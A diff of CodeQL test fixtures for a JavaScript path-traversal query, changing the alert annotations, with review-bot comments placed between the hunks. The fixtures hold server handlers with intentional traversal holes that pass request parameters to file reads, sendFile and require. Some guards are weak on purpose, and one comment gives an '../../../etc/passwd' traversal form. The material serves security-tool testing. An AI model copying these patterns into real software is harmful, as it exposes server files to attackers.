--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..93255a7ab518 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js 
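Review bot: The rewritten comment `// OK - Verify that the file path is under the root directory` fuses an expectation marker with an imperative description of the code, so it reads as neither. Since this line documents the mitigation (resolve, `realpathSync`, then a prefix check against a `ROOT` that ends in `/`), a declarative form would be clearer: `// OK - the resolved real path is checked to be under the root directory`. The handler body continues past the end of the hunk.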
@@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Alert - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..2c251b8de379 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js 
@@ -10,21 +10,21 @@ let app = express(); app.get('/basic', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { let path = pathModule.normalize(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { 
@@ -33,21 +33,21 @@ app.get('/normalize-notAbsolute', (req, res) => { if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { @@ -56,16 +56,16 @@ app.get('/normalize-noInitialDotDot', (req, res) => { if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { @@ -73,9 +73,9 @@ app.get('/prepend-normalize', (req, res) => { let path = pathModule.normalize('./' + req.query.path); if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { 
@@ -84,10 +84,10 @@ app.get('/absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { @@ -96,10 +96,10 @@ app.get('/normalized-absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { 
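Review bot: With the `// OK` marker removed, the `path.startsWith('/home/user/www')` branch in `/normalized-absolute` becomes an implicit no-alert expectation. Nothing records that the prefix has no trailing separator, so a normalized absolute path under a sibling directory such as `/home/user/www-old` (constructed example) also satisfies it. The same unannotated prefix pattern appears in later hunks: `/combined-check`, `/coerce-absolute`, and `allowPath` in `/yet-another-prefix2`, where `rootPath` is `process.cwd()`. If the query intentionally accepts this as a barrier, a comment would keep the fixture from being read as a safe pattern, e.g. `// OK for the query - prefix has no trailing separator, so sibling directories also match`. The handler bodies begin outside these hunks.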
@@ -107,53 +107,53 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { let path = fs.realpathSync(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { let path = pathModule.join('.', req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { let path = pathModule.join('/home/user/www', req.query.path); if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { let path = 'foo/' + pathModule.normalize(req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { 
@@ -162,12 +162,12 @@ app.get('/noDotDot', (req, res) => { if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { 
@@ -181,119 +181,119 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { let path = pathModule.normalize(req.query.path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + 
fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! 
+ fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); @@ -301,35 +301,35 @@ var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } 
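Review bot: The annotation `// $ SPURIOUS: Alert` on the `normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')` branch in `/join-regression` drops the explanation the old comment carried (`OK - but flagged anyway [INCONSISTENCY]`). The reason this is a false positive is therefore no longer recorded. From the hunk it appears that the single `startsWith` check just above is accepted while the disjunction of two is not. Keeping that on the line would help whoever later fixes the query, e.g. `// $ SPURIOUS: Alert - disjunction of prefix checks is not recognised as a barrier`. The handler starts outside the hunk.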
@@ -338,34 +338,34 @@ app.get('/pseudo-normalizations', (req, res) => { app.get('/yet-another-prefix', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; 
@@ -376,56 +376,56 @@ import slash from 'slash'; app.get('/slash-stuff', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); 
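Review bot: In the `/dotdot-matchAll-regexp` handler the guards `if (!path.matchAll(/…/))` do not behave like the `match` guards in `/dotdot-regexp` that they mirror. `String.prototype.matchAll` throws a TypeError for a regex without the `g` flag, and with it returns an iterator that is always truthy, so the guarded `fs.readFileSync(path)` lines never run. The no-alert expectations therefore record how the query models the call, not a working traversal check. Now that the `// OK` markers are gone, a comment at the top of the handler such as `// matchAll is modelled like match; at runtime it needs /g and returns an always-truthy iterator` would stop the pattern from being copied as a real guard.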
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..8d2bfe11feb7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -8,20 +8,20 @@ var http = require("http"), var server = http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -37,9 +37,9 @@ var util = require("util"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); 
@@ -48,37 +48,37 @@ const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..d3ee99d4974b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -4,11 +4,11 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..fa19da302606 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..aaa6cfdc2407 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js 
@@ -5,30 +5,30 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -37,7 +37,7 @@ var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -46,5 +46,5 @@ const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js 
@@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..e18e3c7e8bb1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -8,8 +8,8 @@ var server = http.createServer(function(req, res) { }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js 
@@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..9a200f2a4c99 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js 
@@ -4,25 +4,22 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..d705be16b317 100644 
